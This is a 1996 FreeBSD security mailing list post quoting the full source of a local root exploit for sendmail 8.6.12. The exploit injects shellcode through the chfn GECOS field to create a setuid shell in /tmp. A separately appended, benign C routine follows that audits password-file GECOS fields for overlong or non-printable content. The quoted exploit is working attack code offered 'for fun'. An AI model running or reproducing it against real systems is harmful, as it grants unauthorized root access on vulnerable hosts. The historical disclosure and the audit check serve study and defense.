Date: Fri, 27 Sep 1996 01:24:28 +0200
From: Stefan Zehl <sec@wg.camelot.de>
To: security@freebsd.org
Subject: Re: Exploit for sendmail security hole (version 8.6.12 for FreeBSD
Message-ID: <199609262324.BAA24530@matrix.wg.camelot.de>

I could not confirm the following for FreeBSD 2.1.0R while running NIS.
I will try on a non-NIS machine tomorrow, but I think it might be
of interest anyway :)
: /* Hi ! */
: /* This is exploit for sendmail bug (version 8.6.12 for FreeBSD 2.1.0). */
: /* If you have any problems with it, send letter to me. */
: /* Have fun ! */
: /* ----------------- Dedicated to my beautiful lady ------------------ */
: /* Leshka Zakharoff, 1996. E-mail: leshka@chci.chuvashia.su */
: #include <stdio.h>
: main()
: {
: void make_files();
: make_files();
: system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn;/usr/sbin/sendmail;echo See result in /tmp");
: }
: void make_files()
: {
: int i,j;
: FILE *f;
: char nop_string[200];
: char code_string[]=
: {
: "\xeb\x50" /* jmp cont */
: /* geteip: */ "\x5d" /* popl %ebp */
: "\x55" /* pushl %ebp */
: "\xff\x8d\xc3\xff\xff\xff" /* decl 0xffffffc3(%ebp) */
: "\xff\x8d\xd7\xff\xff\xff" /* decl 0xffffffd7(%ebp) */
: "\xc3" /* ret */
: /* 0xffffffb4(%ebp): */ "cp /bin/sh /tmp"
: /* 0xffffffc3(%ebp): */ "\x3c"
: "chmod a=rsx /tmp/sh"
: /* 0xffffffd7(%ebp): */ "\x01"
: "-leshka-leshka-leshka-leshka-" /* reserved */
: /* cont: */ "\xc7\xc4\x70\xcf\xbf\xef" /* movl $0xefbfcf70,%esp */
: "\xe8\xa5\xff\xff\xff" /* call geteip */
: "\x81\xc5\xb4\xff\xff\xff" /* addl $0xb4ffffff,%ebp */
: "\x55" /* pushl %ebp */
: "\x55" /* pushl %ebp */
: "\x68\xd0\x77\x04\x08" /* pushl $0x80477d0 */
: "\xc3" /* ret */
: "-leshka-leshka-leshka-leshka-" /* reserved */
: "\xa0\xcf\xbf\xef"
: };
: j=269-sizeof(code_string);
: for(i=0;i<j;nop_string[i++]='\x90');
: nop_string[j]='\0';
: f=fopen("user.inf","w");
: fprintf(f,"#Changing user database information for leshka\n");
: fprintf(f,"Shell: /usr/local/bin/bash\n");
: fprintf(f,"Location: \n");
: fprintf(f,"Office Phone: \n");
: fprintf(f,"Home Phone: \n");
: fprintf(f,"Full Name: %s%s\n",nop_string,code_string);
: fclose(f);
: f=fopen("hack","w");
: fprintf(f,"cat user.inf>\"$1\"\n");
: fprintf(f,"touch -t 2510711313 \"$1\"\n");
: fclose(f);
: }
CU,
Sec
--
Every day on which you do not smile is a lost day. (C. Chaplin)
Hiroshima '45 Tsjernobyl '86 Windows '95
Black holes are where GOD is dividing by zero
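
The quoted program uses chfn to put a 269-byte-plus string of 0x90 bytes and machine code into the "Full Name" (GECOS) field. As an added example (not part of the original message and not sendmail or FreeBSD code), here is a defender's audit check that flags password-file records whose GECOS field is overlong or contains non-printable bytes. The function names, flag values, sample records and the length limit are assumptions of this example, and it treats any byte outside printable ASCII as suspicious.

```c
#include <stdio.h>
#include <string.h>

/* Result flags; they can be OR-ed together. */
#define GECOS_OK        0
#define GECOS_TOO_LONG  1
#define GECOS_NON_PRINT 2
#define GECOS_MALFORMED 4

/* Constructed sample records in passwd(5) layout, not from a real system. */
static const char SAMPLE_OK[]  = "alice:*:1001:1001:Alice Example,,,:/home/alice:/bin/sh";
static const char SAMPLE_BAD[] = "bob:*:1002:1002:\x90\x90\x90\x90" " Bob:/home/bob:/bin/sh";

/* Return the start of colon-separated field `idx` (0-based) and store its
 * length in *len; NULL if the record has fewer fields than that. */
static const char *field(const char *line, int idx, size_t *len)
{
    const char *p = line;
    while (idx-- > 0) {
        p = strchr(p, ':');
        if (p == NULL) return NULL;
        p++;
    }
    *len = strcspn(p, ":\n");
    return p;
}

/* Audit the GECOS field of one record. gecos_idx is 4 for passwd(5) and
 * 7 for BSD master.passwd(5); max_len is the site's own policy limit. */
int audit_gecos(const char *line, int gecos_idx, size_t max_len)
{
    size_t len, i;
    int flags = GECOS_OK;
    const char *g = field(line, gecos_idx, &len);

    if (g == NULL) return GECOS_MALFORMED;
    if (len > max_len) flags |= GECOS_TOO_LONG;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)g[i];
        if (c < 0x20 || c > 0x7e) { flags |= GECOS_NON_PRINT; break; }
    }
    return flags;
}

int main(void)
{
    printf("ok=%d bad=%d\n", audit_gecos(SAMPLE_OK, 4, 128), audit_gecos(SAMPLE_BAD, 4, 128));
    return 0;
}
```

Run it over each line of the password database and review any record that returns a non-zero value.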
